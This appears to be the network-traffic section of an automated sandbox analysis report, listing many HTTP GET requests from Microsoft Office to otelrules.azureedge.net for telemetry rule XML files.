Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
